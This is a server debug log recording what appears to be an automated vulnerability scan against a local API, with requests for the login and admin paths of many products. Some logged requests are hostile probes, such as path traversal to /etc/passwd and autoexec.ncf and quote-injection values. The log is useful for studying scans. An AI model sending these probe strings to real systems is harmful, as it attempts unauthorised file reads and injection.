+2022-10-31T22:39:23.654Z debug: [1667255963652, duration: 1] GET:/api/content/qp1kzq_f2a.mp3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.687Z debug: [1667255963685, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:23.695Z debug: [1667255963694, duration: 1] GET:/api/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.922Z debug: [1667255963921, duration: 0] GET:/api/servlet/com.newatlanta.servletexec.JSP10Servlet, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.945Z debug: [1667255963944, duration: 0] GET:/api/global.asa, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:23.975Z debug: [1667255963973, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:23.982Z debug: [1667255963981, duration: 0] GET:/api/wbm/login/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.020Z debug: [1667255964017, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.029Z debug: [1667255964028, duration: 1] GET:/api/Portal/Portal.mwsl?MainSelection=USFW&TabSelection=NONE&ClientArea=/Portal/usfw-login.mwsl&DataFile=NONE&TemplateFile=NONE, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.170Z debug: [1667255964169, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.215Z debug: [1667255964214, duration: 0] GET:/api/InitialPage.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.255Z debug: [1667255964254, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.262Z debug: [1667255964261, duration: 1] GET:/api/home.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.295Z debug: [1667255964293, duration: 1] GET:/api/home.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.321Z debug: [1667255964319, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.329Z debug: [1667255964328, duration: 1] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.366Z debug: [1667255964365, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.374Z debug: [1667255964372, duration: 1] GET:/api/no_such_file_F1OD0NKs.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.406Z debug: [1667255964404, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.413Z debug: [1667255964412, duration: 0] GET:/api/plc/webvisu.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.442Z debug: [1667255964440, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.448Z debug: [1667255964447, duration: 1] GET:/api/html/iscscada.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.515Z debug: [1667255964514, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.522Z debug: [1667255964521, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.551Z debug: [1667255964550, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.588Z debug: [1667255964587, duration: 1] GET:/api/OEMSettings.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.634Z debug: [1667255964630, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.710Z debug: [1667255964709, duration: 0] GET:/api/web/signin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.721Z debug: [1667255964720, duration: 0] GET:/api/main/web/status/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.755Z debug: [1667255964753, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.762Z debug: [1667255964761, duration: 1] GET:/api/broadWeb/bwRoot.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.793Z debug: [1667255964792, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.801Z debug: [1667255964800, duration: 0] GET:/api/iView3/pages/version.frag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.848Z debug: [1667255964846, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.855Z debug: [1667255964854, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.883Z debug: [1667255964881, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:24.891Z debug: [1667255964890, duration: 0] POST:/api/sawmillcl.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.922Z debug: [1667255964921, duration: 1] GET:/api/sawmillcl.exe?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.932Z debug: [1667255964931, duration: 1] POST:/api/sawmill6cl.exe, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.955Z debug: [1667255964954, duration: 1] GET:/api/sawmill6cl.exe?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.963Z debug: [1667255964962, duration: 1] POST:/api/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:24.972Z debug: [1667255964970, duration: 1] GET:/api/?ho+{COMPLETE_VERSION}, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.244Z debug: [1667255965243, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.319Z debug: [1667255965318, duration: 1] GET:/api/SAPHostControl/?wsdl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.349Z debug: [1667255965348, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.434Z debug: [1667255965431, duration: 2] GET:/api/sapmc/sapmc.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.465Z debug: [1667255965463, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.472Z debug: [1667255965471, duration: 0] GET:/api/AdminTools/querybuilder/nn.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.512Z debug: [1667255965511, duration: 1] GET:/api/search/results.stm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.532Z debug: [1667255965531, duration: 0] GET:/api/WebID/IISWebAgentIF.dll?postdata=">, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.552Z debug: [1667255965550, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.560Z debug: [1667255965559, duration: 0] GET:/api/apps/zxtm/login.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.590Z debug: [1667255965588, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.596Z debug: [1667255965596, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.634Z debug: [1667255965632, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.642Z debug: [1667255965641, duration: 1] GET:/api/vncviewer.jar, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.673Z debug: [1667255965672, duration: 0] GET:/api/names.nsf/view?ReadDesign, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.698Z debug: [1667255965695, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.706Z debug: [1667255965706, duration: 0] GET:/api/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.736Z debug: [1667255965734, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.745Z debug: [1667255965744, duration: 0] GET:/api/cgi-bin/authLogin.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.777Z debug: [1667255965776, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.784Z debug: [1667255965783, duration: 1] GET:/api/photo/lang/ENG.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.829Z debug: [1667255965827, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.835Z debug: [1667255965833, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.839Z debug: [1667255965838, duration: 1] GET:/api/1667256042/facts/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.843Z debug: [1667255965842, duration: 1] GET:/api/cas/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.845Z debug: [1667255965844, duration: 1] GET:/api/1667256042/certificate/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.848Z debug: [1667255965847, duration: 0] GET:/api/v2.0/environments/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.850Z debug: [1667255965849, duration: 1] GET:/api/auth/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.851Z debug: [1667255965851, duration: 0] GET:/api/puppet-ca/v1/certificate/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.854Z debug: [1667255965853, duration: 1] GET:/api/puppet/v3/facts/ad-daisy-seed01.test-server.ag, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.903Z debug: [1667255965902, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.916Z debug: [1667255965915, duration: 1] GET:/api/cgi-bin/printenv, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.924Z debug: [1667255965922, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.930Z debug: [1667255965929, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.951Z debug: [1667255965949, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.958Z debug: [1667255965957, duration: 1] GET:/api/ad_click.asp?banner_id=', reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:25.966Z debug: [1667255965965, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:25.975Z debug: [1667255965974, duration: 1] GET:/api/dagent/proxyreg.asp?List=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.462Z debug: [1667255966460, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.464Z debug: [1667255966463, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.472Z debug: [1667255966471, duration: 0] GET:/api/perl?-v, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.473Z debug: [1667255966472, duration: 1] GET:/api/cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd%00, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.481Z debug: [1667255966480, duration: 0] GET:/api/perl.exe?-v, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.508Z debug: [1667255966506, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.517Z debug: [1667255966516, duration: 0] GET:/api/html/en/index.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.527Z debug: [1667255966526, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.535Z debug: [1667255966534, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.561Z debug: [1667255966559, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.573Z debug: [1667255966572, duration: 1] GET:/api/PAN_help/en/wwhelp/wwhimpl/common/private/title.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.574Z debug: [1667255966574, duration: 0] GET:/api/login.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.597Z debug: [1667255966596, duration: 1] GET:/api/exchweb/bin/auth/owalogon.asp?url=http://12345678910, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.616Z debug: [1667255966613, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.624Z debug: [1667255966624, duration: 0] GET:/api/owa/auth/logon.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.633Z debug: [1667255966632, duration: 0] GET:/api/exchange/logon.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.634Z debug: [1667255966631, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.641Z debug: [1667255966641, duration: 0] GET:/api/otrs/index.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.674Z debug: [1667255966672, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.682Z debug: [1667255966680, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.683Z debug: [1667255966682, duration: 1] GET:/api/ossim/session/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.689Z debug: [1667255966688, duration: 0] GET:/api/av/api/1.0/system/local/tasks, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.713Z debug: [1667255966711, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.727Z debug: [1667255966727, duration: 0] GET:/api/.DS_Store, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.728Z debug: [1667255966726, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.735Z debug: [1667255966735, duration: 0] GET:/api/ws_utc/login.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.743Z debug: [1667255966742, duration: 1] GET:/api/wls_utc/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.758Z debug: [1667255966756, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.765Z debug: [1667255966764, duration: 1] GET:/api/cs/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.773Z debug: [1667255966772, duration: 0] GET:/api/idc/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.778Z debug: [1667255966776, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.780Z debug: [1667255966779, duration: 1] GET:/api/idcplg?IdcService=GET_ENVIRONMENT&IsJson=1, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.785Z debug: [1667255966784, duration: 0] GET:/api/web-determinations/?CookieSet=true, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.818Z debug: [1667255966816, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.827Z debug: [1667255966825, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.829Z debug: [1667255966826, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.834Z debug: [1667255966833, duration: 1] GET:/api/sgdadmin/faces/jsp/Version.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.867Z debug: [1667255966866, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.878Z debug: [1667255966877, duration: 1] GET:/api/gateway/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.879Z debug: [1667255966876, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.888Z debug: [1667255966887, duration: 0] GET:/api/portal/page/portal/Design_Time_PG/Welcome, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.898Z debug: [1667255966898, duration: 0] GET:/api/page/portal/Design_Time_PG/Welcome, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.916Z debug: [1667255966915, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.923Z debug: [1667255966922, duration: 1] GET:/api/mapviewer/omserver?getv=t, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.938Z debug: [1667255966937, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.945Z debug: [1667255966945, duration: 0] GET:/api/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.954Z debug: [1667255966953, duration: 1] GET:/api/portal/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.963Z debug: [1667255966962, duration: 0] GET:/api/portal/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.968Z debug: [1667255966966, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.971Z debug: [1667255966971, duration: 0] GET:/api/portal/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.976Z debug: [1667255966974, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:26.979Z debug: [1667255966979, duration: 0] GET:/api/portal/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.988Z debug: [1667255966987, duration: 1] GET:/api/portal/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:26.996Z debug: [1667255966996, duration: 0] GET:/api/portal/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.006Z debug: [1667255967005, duration: 0] GET:/api/portal/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.010Z debug: [1667255967009, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.013Z debug: [1667255967013, duration: 0] GET:/api/portal/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.020Z debug: [1667255967019, duration: 0] GET:/api/dndirector/dashboard/Show.dn, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.028Z debug: [1667255967027, duration: 0] GET:/api/portal/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.036Z debug: [1667255967036, duration: 0] GET:/api/portal/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.046Z debug: [1667255967045, duration: 0] GET:/api/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.058Z debug: [1667255967058, duration: 0] GET:/api/pls/portal/DEV_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.060Z debug: [1667255967057, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.067Z debug: [1667255967067, duration: 0] GET:/api/pls/portal/DEV1_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.070Z debug: [1667255967070, duration: 0] GET:/api/dndirector, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.075Z debug: [1667255967075, duration: 0] GET:/api/pls/portal/DEV2_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.082Z debug: [1667255967082, duration: 0] GET:/api/pls/portal/DEV3_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.090Z debug: [1667255967090, duration: 0] GET:/api/pls/portal/DEV4_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.106Z debug: [1667255967105, duration: 1] GET:/api/pls/portal/DEV5_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.107Z debug: [1667255967105, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.114Z debug: [1667255967113, duration: 1] GET:/api/pls/portal/DEV6_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.116Z debug: [1667255967115, duration: 0] GET:/api/btmui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.123Z debug: [1667255967122, duration: 1] GET:/api/pls/portal/DEV7_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.132Z debug: [1667255967131, duration: 0] GET:/api/pls/portal/DEV8_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.141Z debug: [1667255967140, duration: 0] GET:/api/pls/portal/DEV9_PORTAL_DEMO.ORG_CHART.SHOW, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.148Z debug: [1667255967147, duration: 1] GET:/api/apex/f?p=nessuscheck, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.150Z debug: [1667255967150, duration: 0] GET:/api/pls/apex/f?p=nessuscheck, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.175Z debug: [1667255967174, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.182Z debug: [1667255967181, duration: 1] GET:/api/cgi-bin/luci, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.233Z debug: [1667255967231, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.241Z debug: [1667255967240, duration: 1] GET:/api/dwr/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.271Z debug: [1667255967270, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.279Z debug: [1667255967278, duration: 1] GET:/api/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.291Z debug: [1667255967289, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.298Z debug: [1667255967297, duration: 1] GET:/api/cgi-bin/pub/pki?cmd=serverInfo, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.324Z debug: [1667255967320, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.334Z debug: [1667255967333, duration: 1] GET:/api/ofbizsetup/control/checkLogin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.343Z debug: [1667255967342, duration: 0] GET:/api/ordermgr/control/checkLogin, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.352Z debug: [1667255967351, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.360Z debug: [1667255967358, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.382Z debug: [1667255967381, duration: 1] GET:/api/netbasic/websinfo.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.385Z debug: [1667255967384, duration: 1] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.388Z debug: [1667255967388, duration: 0] GET:/api/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.389Z debug: [1667255967389, duration: 0] GET:/api/util/chkvol.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.391Z debug: [1667255967390, duration: 0] GET:/api/perl/samples/lancgi.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.392Z debug: [1667255967391, duration: 0] GET:/api/util/dir.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.393Z debug: [1667255967392, duration: 1] GET:/api/perl/samples/ndslogin.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.396Z debug: [1667255967394, duration: 0] GET:/api/util/glist.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.397Z debug: [1667255967396, duration: 0] GET:/api/util/lancard.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.398Z debug: [1667255967398, duration: 0] GET:/api/perl/samples/volscgi.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.399Z debug: [1667255967399, duration: 0] GET:/api/util/set.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.400Z debug: [1667255967400, duration: 0] GET:/api/perl/samples/env.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.401Z debug: [1667255967401, duration: 0] GET:/api/util/userlist.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.404Z debug: [1667255967402, duration: 0] GET:/api/nsn/env.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.405Z debug: [1667255967404, duration: 0] GET:/api/nsn/fdir.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.406Z debug: [1667255967405, duration: 0] GET:/api/web/env.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.408Z debug: [1667255967407, duration: 1] GET:/api/webdemo/fdir.bas, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.451Z debug: [1667255967449, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.452Z debug: [1667255967449, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.458Z debug: [1667255967457, duration: 1] GET:/api/nps/servlet/portal, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.459Z debug: [1667255967459, duration: 0] GET:/api/IDMProv/jsps/help/Help.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.495Z debug: [1667255967492, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.497Z debug: [1667255967496, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.503Z debug: [1667255967502, duration: 1] GET:/api/gwadmin-console/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.505Z debug: [1667255967504, duration: 0] GET:/api/logout, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.550Z debug: [1667255967549, duration: 0] GET:/api/examples/jsp/source.jsp?%2e%2e/%2e%2e/%2e%2e/%2e%2e/system/autoexec.ncf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.551Z debug: [1667255967551, duration: 0] POST:/api/perl/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.571Z debug: [1667255967570, duration: 0] GET:/api/help/contents.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.573Z debug: [1667255967572, duration: 1] GET:/api/manual/ag/contents.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.574Z debug: [1667255967572, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.582Z debug: [1667255967581, duration: 1] GET:/api/images, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.603Z debug: [1667255967602, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.611Z debug: [1667255967610, duration: 0] GET:/api/baselining/version, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.614Z debug: [1667255967609, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.620Z debug: [1667255967620, duration: 0] GET:/api/nps/servlet/portalservice, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.645Z debug: [1667255967643, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.654Z debug: [1667255967653, duration: 1] GET:/api/debuginfo.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.655Z debug: [1667255967653, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.662Z debug: [1667255967661, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.685Z debug: [1667255967684, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.694Z debug: [1667255967692, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.694Z debug: [1667255967693, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.700Z debug: [1667255967699, duration: 1] GET:/api/qsoap.qap, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.725Z debug: [1667255967724, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.733Z debug: [1667255967732, duration: 0] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.734Z debug: [1667255967731, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.742Z debug: [1667255967741, duration: 1] GET:/api/nacos/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.767Z debug: [1667255967765, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.776Z debug: [1667255967774, duration: 1] GET:/api/, reqOrigin: 